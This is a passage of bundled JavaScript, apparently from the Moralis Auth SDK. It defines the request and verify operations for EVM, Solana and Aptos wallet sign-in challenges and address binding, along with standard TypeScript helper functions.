        network: (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(jsonRequest.network),
        address: (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(jsonRequest.address),
        publicKey: jsonRequest.publicKey,
        statement: jsonRequest.statement,
        uri: jsonRequest.uri,
        expirationTime: jsonRequest.expirationTime,
        notBefore: jsonRequest.notBefore,
        resources: jsonRequest.resources,
        timeout: jsonRequest.timeout
    };
}
var $6d44480aa8bfcb7a$export$80547e5d684395d8 = {
    method: "POST",
    name: "verifyChallengeEvm",
    id: "verifyChallengeEvm",
    groupName: "evm",
    urlPathPattern: "/challenge/verify/evm",
    bodyParamNames: [
        "message",
        "signature"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$8,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$7,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$8,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$8,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$8
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$8() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$7(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$8(_a) {
    var chainId = _a.chainId, jsonResponse = $6d44480aa8bfcb7a$var$__rest(_a, [
        "chainId"
    ]);
    return $6d44480aa8bfcb7a$var$__assign($6d44480aa8bfcb7a$var$__assign({}, jsonResponse), {
        chain: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chainId),
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(jsonResponse.address),
        expirationTime: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.expirationTime, function(value) {
            return new Date(value);
        }),
        notBefore: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.notBefore, function(value) {
            return new Date(value);
        })
    });
}
function $6d44480aa8bfcb7a$var$serializeRequest$8(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$8(jsonRequest) {
    return {
        message: jsonRequest.message,
        signature: jsonRequest.signature
    };
}
/** The back channel challenge containing the id to store on the api and the message to be signed by the user */ var $6d44480aa8bfcb7a$export$e3f1db80418a6af5 = {
    method: "POST",
    name: "requestChallengeEvm",
    id: "requestChallengeEvm",
    groupName: "evm",
    urlPathPattern: "/challenge/request/evm",
    bodyParamNames: [
        "domain",
        "chainId",
        "address",
        "statement",
        "uri",
        "expirationTime",
        "notBefore",
        "resources",
        "timeout"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$7,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$6,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$7,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$7,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$7
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$7() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$6(request, core) {
    return {
        domain: request.domain,
        chainId: (0, $3dfc2d9370ba0cd1$export$f9c4238e05371bd3).resolve(request.chainId, core).hex,
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).checksum,
        statement: request.statement,
        uri: request.uri,
        expirationTime: request.expirationTime,
        notBefore: request.notBefore,
        resources: request.resources,
        timeout: request.timeout
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$7(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$7(request, core) {
    return {
        domain: request.domain,
        chainId: (0, $3dfc2d9370ba0cd1$export$f9c4238e05371bd3).resolve(request.chainId, core).decimal.toString(),
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).checksum,
        statement: request.statement,
        uri: request.uri,
        expirationTime: request.expirationTime,
        notBefore: request.notBefore,
        resources: request.resources,
        timeout: request.timeout
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$7(jsonRequest, core) {
    return {
        domain: jsonRequest.domain,
        chainId: (0, $3dfc2d9370ba0cd1$export$f9c4238e05371bd3).resolve(jsonRequest.chainId, core),
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(jsonRequest.address),
        statement: jsonRequest.statement,
        uri: jsonRequest.uri,
        expirationTime: jsonRequest.expirationTime,
        notBefore: jsonRequest.notBefore,
        resources: jsonRequest.resources,
        timeout: jsonRequest.timeout
    };
}
var $6d44480aa8bfcb7a$export$ef92395caf3d55db = {
    method: "GET",
    name: "getAddresses",
    id: "getAddresses",
    groupName: "evm",
    urlPathPattern: "/profile/{profileId}/addresses",
    urlPathParamNames: [
        "profileId"
    ],
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$6,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$6,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$6,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$6
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$6(request) {
    return {
        profileId: request.profileId
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$6(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$6(request) {
    return request;
}
function $6d44480aa8bfcb7a$var$deserializeRequest$6(jsonRequest) {
    return jsonRequest;
}
var $6d44480aa8bfcb7a$export$7b860253812abd80 = {
    method: "POST",
    name: "removeBind",
    id: "removeBind",
    groupName: "evm",
    urlPathPattern: "/bind/remove",
    bodyParamNames: [
        "blockchainType",
        "address",
        "profileId",
        "publicKey"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$5,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$5,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$5,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$5,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$5
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$5() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$5(request) {
    return {
        blockchainType: request.blockchainType,
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).checksum,
        profileId: request.profileId,
        publicKey: request.publicKey
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$5(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$5(request) {
    return {
        blockchainType: request.blockchainType,
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).checksum,
        profileId: request.profileId,
        publicKey: request.publicKey
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$5(jsonRequest) {
    return {
        blockchainType: jsonRequest.blockchainType,
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(jsonRequest.address),
        profileId: jsonRequest.profileId,
        publicKey: jsonRequest.publicKey
    };
}
var $6d44480aa8bfcb7a$export$619c46a56f2f6ef6 = {
    method: "POST",
    name: "requestBind",
    id: "requestBind",
    groupName: "evm",
    urlPathPattern: "/bind/request",
    bodyParamNames: [
        "addresses"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$4,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$4,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$4,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$4,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$4
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$4() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$4(request) {
    return {
        addresses: request.addresses.map(function(address) {
            return {
                blockchainType: address.blockchainType,
                address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address.address).checksum
            };
        })
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$4(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$4(request) {
    return {
        addresses: request.addresses.map(function(address) {
            return {
                blockchainType: address.blockchainType,
                address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address.address).checksum
            };
        })
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$4(jsonRequest) {
    return {
        addresses: jsonRequest.addresses.map(function(address) {
            return {
                blockchainType: address.blockchainType,
                address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address.address)
            };
        })
    };
}
var $6d44480aa8bfcb7a$export$6d5060bd128599e3 = {
    method: "POST",
    name: "verifyRemoveBind",
    id: "verifyRemoveBind",
    groupName: "evm",
    urlPathPattern: "/bind/remove/verify",
    bodyParamNames: [
        "message",
        "signature"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$3,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$3,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$3,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$3,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$3
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$3() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$3(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$3(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$3(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$3(jsonRequest) {
    return {
        message: jsonRequest.message,
        signature: jsonRequest.signature
    };
}
var $6d44480aa8bfcb7a$export$3d1df29724c2994e = {
    method: "POST",
    name: "verifyRequestBind",
    id: "verifyRequestBind",
    groupName: "evm",
    urlPathPattern: "/bind/request/verify",
    bodyParamNames: [
        "verifications"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$2,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$2,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$2,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$2,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$2
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$2() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$2(request) {
    return {
        verifications: request.verifications
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$2(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest$2(request) {
    return {
        verifications: request.verifications
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$2(jsonRequest) {
    return {
        verifications: jsonRequest.verifications
    };
}
var $6d44480aa8bfcb7a$export$cc9e07d83e42ba94 = {
    method: "POST",
    name: "verifyChallengeSolana",
    id: "verifyChallengeSolana",
    groupName: "solana",
    urlPathPattern: "/challenge/verify/solana",
    bodyParamNames: [
        "message",
        "signature"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams$1,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody$1,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest$1,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest$1,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse$1
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams$1() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody$1(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse$1(_a) {
    var network = _a.network, jsonResponse = $6d44480aa8bfcb7a$var$__rest(_a, [
        "network"
    ]);
    return $6d44480aa8bfcb7a$var$__assign($6d44480aa8bfcb7a$var$__assign({}, jsonResponse), {
        solNetwork: (0, $cb2d40467f9cecb7$export$27894271d6c8b00).create(network),
        address: (0, $cb2d40467f9cecb7$export$a1a535cec16ecc43).create(jsonResponse.address),
        expirationTime: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.expirationTime, function(value) {
            return new Date(value);
        }),
        notBefore: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.notBefore, function(value) {
            return new Date(value);
        })
    });
}
function $6d44480aa8bfcb7a$var$serializeRequest$1(request) {
    return {
        message: request.message,
        signature: request.signature
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest$1(jsonRequest) {
    return {
        message: jsonRequest.message,
        signature: jsonRequest.signature
    };
}
/** The back channel challenge containing the id to store on the api and the message to be signed by the user */ var $6d44480aa8bfcb7a$export$3868e9cdf49d23d5 = {
    method: "POST",
    name: "requestChallengeSolana",
    id: "requestChallengeSolana",
    groupName: "solana",
    urlPathPattern: "/challenge/request/solana",
    bodyParamNames: [
        "domain",
        "network",
        "address",
        "statement",
        "uri",
        "expirationTime",
        "notBefore",
        "resources",
        "timeout"
    ],
    bodyType: "properties",
    getRequestUrlParams: $6d44480aa8bfcb7a$var$getRequestUrlParams,
    getRequestBody: $6d44480aa8bfcb7a$var$getRequestBody,
    serializeRequest: $6d44480aa8bfcb7a$var$serializeRequest,
    deserializeRequest: $6d44480aa8bfcb7a$var$deserializeRequest,
    deserializeResponse: $6d44480aa8bfcb7a$var$deserializeResponse
};
// Methods
function $6d44480aa8bfcb7a$var$getRequestUrlParams() {
    return {};
}
function $6d44480aa8bfcb7a$var$getRequestBody(request) {
    return {
        domain: request.domain,
        network: (0, $cb2d40467f9cecb7$export$27894271d6c8b00).create(request.network).network,
        address: (0, $cb2d40467f9cecb7$export$a1a535cec16ecc43).create(request.address).address,
        statement: request.statement,
        uri: request.uri,
        expirationTime: request.expirationTime,
        notBefore: request.notBefore,
        resources: request.resources,
        timeout: request.timeout
    };
}
function $6d44480aa8bfcb7a$var$deserializeResponse(jsonResponse) {
    return jsonResponse;
}
function $6d44480aa8bfcb7a$var$serializeRequest(request) {
    return {
        domain: request.domain,
        network: (0, $cb2d40467f9cecb7$export$27894271d6c8b00).create(request.network).network,
        address: (0, $cb2d40467f9cecb7$export$a1a535cec16ecc43).create(request.address).address,
        statement: request.statement,
        uri: request.uri,
        expirationTime: request.expirationTime,
        notBefore: request.notBefore,
        resources: request.resources,
        timeout: request.timeout
    };
}
function $6d44480aa8bfcb7a$var$deserializeRequest(jsonRequest) {
    return {
        domain: jsonRequest.domain,
        network: (0, $cb2d40467f9cecb7$export$27894271d6c8b00).create(jsonRequest.network),
        address: (0, $cb2d40467f9cecb7$export$a1a535cec16ecc43).create(jsonRequest.address),
        statement: jsonRequest.statement,
        uri: jsonRequest.uri,
        expirationTime: jsonRequest.expirationTime,
        notBefore: jsonRequest.notBefore,
        resources: jsonRequest.resources,
        timeout: jsonRequest.timeout
    };
}
var $6d44480aa8bfcb7a$export$59894c102379d64a = [
    $6d44480aa8bfcb7a$export$3868e9cdf49d23d5,
    $6d44480aa8bfcb7a$export$e3f1db80418a6af5,
    $6d44480aa8bfcb7a$export$77a3605096ebf35e,
    $6d44480aa8bfcb7a$export$cc9e07d83e42ba94,
    $6d44480aa8bfcb7a$export$80547e5d684395d8,
    $6d44480aa8bfcb7a$export$a4f0d9af7f5deedd,
    $6d44480aa8bfcb7a$export$ef92395caf3d55db,
    $6d44480aa8bfcb7a$export$7b860253812abd80,
    $6d44480aa8bfcb7a$export$619c46a56f2f6ef6,
    $6d44480aa8bfcb7a$export$6d5060bd128599e3,
    $6d44480aa8bfcb7a$export$3d1df29724c2994e
];



/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $15acea11234fc715$var$extendStatics = function(d, b) {
    $15acea11234fc715$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $15acea11234fc715$var$extendStatics(d, b);
};
function $15acea11234fc715$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $15acea11234fc715$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $15acea11234fc715$var$__assign = function() {
    $15acea11234fc715$var$__assign = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $15acea11234fc715$var$__assign.apply(this, arguments);
};
function $15acea11234fc715$var$__rest(s, e) {
    var t = {};
    for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        for(var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++)if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i])) t[p[i]] = s[p[i]];
    }
    return t;
}
function $15acea11234fc715$var$__awaiter(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
}
function $15acea11234fc715$var$__generator(thisArg, body) {
    var _ = {
        label: 0,
        sent: function() {
            if (t[0] & 1) throw t[1];
            return t[1];
        },
        trys: [],
        ops: []
    }, f, y, t, g;
    return g = {
        next: verb(0),
        "throw": verb(1),
        "return": verb(2)
    }, typeof Symbol === "function" && (g[Symbol.iterator] = function() {
        return this;
    }), g;
    function verb(n) {
        return function(v) {
            return step([
                n,
                v
            ]);
        };
    }
    function step(op) {
        if (f) throw new TypeError("Generator is already executing.");
        while(g && (g = 0, op[0] && (_ = 0)), _)try {
            if (f = 1, y && (t = op[0] & 2 ? y["return"] : op[0] ? y["throw"] || ((t = y["return"]) && t.call(y), 0) : y.next) && !(t = t.call(y, op[1])).done) return t;
            if (y = 0, t) op = [
                op[0] & 2,
                t.value
            ];
            switch(op[0]){
                case 0:
                case 1:
                    t = op;
                    break;
                case 4:
                    _.label++;
                    return {
                        value: op[1],
                        done: false
                    };
                case 5:
                    _.label++;
                    y = op[1];
                    op = [
                        0
                    ];
                    continue;
                case 7:
                    op = _.ops.pop();
                    _.trys.pop();
                    continue;
                default:
                    if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) {
                        _ = 0;
                        continue;
                    }
                    if (op[0] === 3 && (!t || op[1] > t[0] && op[1] < t[3])) {
                        _.label = op[1];
                        break;
                    }
                    if (op[0] === 6 && _.label < t[1]) {
                        _.label = t[1];
                        t = op;
                        break;
                    }
                    if (t && _.label < t[2]) {
                        _.label = t[2];
                        _.ops.push(op);
                        break;
                    }
                    if (t[2]) _.ops.pop();
                    _.trys.pop();
                    continue;
            }
            op = body.call(thisArg, _);
        } catch (e) {
            op = [
                6,
                e
            ];
            y = 0;
        } finally{
            f = t = 0;
        }
        if (op[0] & 5) throw op[1];
        return {
            value: op[0] ? op[1] : void 0,
            done: true
        };
    }
}
var $15acea11234fc715$var$AuthNetworkType;
(function(AuthNetworkType) {
    AuthNetworkType["EVM"] = "evm";
    AuthNetworkType["SOLANA"] = "solana";
    AuthNetworkType["APTOS"] = "aptos";
})($15acea11234fc715$var$AuthNetworkType || ($15acea11234fc715$var$AuthNetworkType = {}));
var $15acea11234fc715$var$makeEvmRequestMessage = function(core, _a) {
    var chain = _a.chain, address = _a.address;
    _a.networkType;
    var options = $15acea11234fc715$var$__rest(_a, [
        "chain",
        "address",
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$e3f1db80418a6af5), $15acea11234fc715$export$ca6dda5263526f75, core).fetch($15acea11234fc715$var$__assign({
        chainId: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chain).hex,
        address: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address).checksum
    }, options));
};
var $15acea11234fc715$var$makeSolRequestMessage = function(core, _a) {
    var address = _a.address;
    _a.networkType;
    var solNetwork = _a.solNetwork, options = $15acea11234fc715$var$__rest(_a, [
        "address",
        "networkType",
        "solNetwork"
    ]);
    // Backwards compatibility for 'solNetwork' option
    if (!options.network && solNetwork) options.network = solNetwork;
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$3868e9cdf49d23d5), $15acea11234fc715$export$ca6dda5263526f75, core).fetch($15acea11234fc715$var$__assign({
        address: (0, $cb2d40467f9cecb7$export$a1a535cec16ecc43).create(address).toString()
    }, options));
};
var $15acea11234fc715$var$makeAptosRequestMessage = function(core, _a) {
    var address = _a.address;
    _a.networkType;
    var options = $15acea11234fc715$var$__rest(_a, [
        "address",
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$77a3605096ebf35e), $15acea11234fc715$export$ca6dda5263526f75, core).fetch($15acea11234fc715$var$__assign({
        address: (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(address).toString()
    }, options));
};
var $15acea11234fc715$var$makeRequestMessage = function(core) {
    return function(options) {
        return $15acea11234fc715$var$__awaiter(void 0, void 0, void 0, function() {
            return $15acea11234fc715$var$__generator(this, function(_a) {
                switch(options.networkType){
                    case $15acea11234fc715$var$AuthNetworkType.EVM:
                        return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeEvmRequestMessage(core, options)
                        ];
                    case $15acea11234fc715$var$AuthNetworkType.SOLANA:
                        return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeSolRequestMessage(core, options)
                        ];
                    case $15acea11234fc715$var$AuthNetworkType.APTOS:
                        return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeAptosRequestMessage(core, options)
                        ];
                    default:
                        if (!options.networkType) return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeEvmRequestMessage(core, options)
                        ];
                        throw new (0, $10891f2cb3e98601$export$9cba5fbb5ec3200e)({
                            code: (0, $10891f2cb3e98601$export$48dd48497c6cb373).INCORRECT_NETWORK,
                            message: 'Incorrect networkType provided. Got "'.concat(options.networkType, '", Valid values are: ').concat(Object.values($15acea11234fc715$var$AuthNetworkType).map(function(value) {
                                return '"'.concat(value, '"');
                            }).join(", "))
                        });
                }
            });
        });
    };
};
var $15acea11234fc715$var$makeEvmVerify = function(core, _a) {
    _a.networkType;
    _a.network;
    var options = $15acea11234fc715$var$__rest(_a, [
        "networkType",
        "network"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$80547e5d684395d8), $15acea11234fc715$export$ca6dda5263526f75, core).fetch({
        message: options.message,
        signature: options.signature
    });
};
var $15acea11234fc715$var$makeSolVerify = function(core, _a) {
    _a.networkType;
    _a.network;
    var options = $15acea11234fc715$var$__rest(_a, [
        "networkType",
        "network"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$cc9e07d83e42ba94), $15acea11234fc715$export$ca6dda5263526f75, core).fetch({
        message: options.message,
        signature: options.signature
    });
};
var $15acea11234fc715$var$makeAptosVerify = function(core, _a) {
    _a.networkType;
    var options = $15acea11234fc715$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$a4f0d9af7f5deedd), $15acea11234fc715$export$ca6dda5263526f75, core).fetch({
        message: options.message,
        signature: options.signature
    });
};
var $15acea11234fc715$var$makeVerify = function(core) {
    return function(options) {
        return $15acea11234fc715$var$__awaiter(void 0, void 0, void 0, function() {
            return $15acea11234fc715$var$__generator(this, function(_a) {
                // Backwards compatibility for the 'network' parameter
                if (!options.networkType && options.network) options.networkType = options.network;
                switch(options.networkType){
                    case $15acea11234fc715$var$AuthNetworkType.EVM:
                        return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeEvmVerify(core, options)
                        ];
                    case $15acea11234fc715$var$AuthNetworkType.SOLANA:
                        return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeSolVerify(core, options)
                        ];
                    case $15acea11234fc715$var$AuthNetworkType.APTOS:
                        return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeAptosVerify(core, options)
                        ];
                    default:
                        if (!options.networkType) return [
                            2 /*return*/ ,
                            $15acea11234fc715$var$makeEvmVerify(core, options)
                        ];
                        throw new (0, $10891f2cb3e98601$export$9cba5fbb5ec3200e)({
                            code: (0, $10891f2cb3e98601$export$48dd48497c6cb373).INCORRECT_NETWORK,
                            message: 'Incorrect network provided. Got "'.concat(options.networkType, '", Valid values are: ').concat(Object.values($15acea11234fc715$var$AuthNetworkType).map(function(value) {
                                return '"'.concat(value, '"');
                            }).join(", "))
                        });
                }
            });
        });
    };
};
var $15acea11234fc715$export$ca6dda5263526f75 = "https://authapi.moralis.io";
var $15acea11234fc715$export$334c29725a78c21d = /** @class */ function(_super) {
    $15acea11234fc715$var$__extends(Auth, _super);
    function Auth(core) {
        var _this = _super.call(this, Auth.moduleName, core, function() {
            return $15acea11234fc715$export$ca6dda5263526f75;
        }) || this;
        // Client-side compatible operation, structured in a predictable way as defined in the operation
        // TODO: generate in seperate package "client-evm-auth" (similar to client-evm-auth)
        _this.evm = {
            getAddresses: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$ef92395caf3d55db), _this.baseUrl, _this.core).fetch(request);
            },
            removeBind: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$7b860253812abd80), _this.baseUrl, _this.core).fetch(request);
            },
            requestBind: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$619c46a56f2f6ef6), _this.baseUrl, _this.core).fetch(request);
            },
            requestChallengeEvm: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$e3f1db80418a6af5), _this.baseUrl, _this.core).fetch(request);
            },
            verifyRemoveBind: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$6d5060bd128599e3), _this.baseUrl, _this.core).fetch(request);
            },
            verifyRequestBind: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$3d1df29724c2994e), _this.baseUrl, _this.core).fetch(request);
            }
        };
        // Client-side compatible operation, structured in a predictable way as defined in the operation
        // TODO: generate in separate package "client-evm-auth" (similar to client-evm-auth)
        _this.solana = {
            requestChallengeSol: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $6d44480aa8bfcb7a$export$3868e9cdf49d23d5), _this.baseUrl, _this.core).fetch(request);
            }
        };
        // Resolves to requestChallengeEvm/requestChallengeSol depending on provided options (defaults to evm)
        _this.requestMessage = function(options) {
            return $15acea11234fc715$var$makeRequestMessage(_this.core)(options);
        };
        return _this;
    }
    Auth.create = function(core) {
        return new Auth(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    Auth.prototype.setup = function() {
    // Nothing
    };
    Auth.prototype.start = function() {
    // Nothing
    };
    Auth.prototype.verify = function(options) {
        return $15acea11234fc715$var$makeVerify(this.core)(options);
    };
    Auth.moduleName = "auth";
    return Auth;
}((0, $10891f2cb3e98601$export$6d7e12e62bd6aef5));






/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
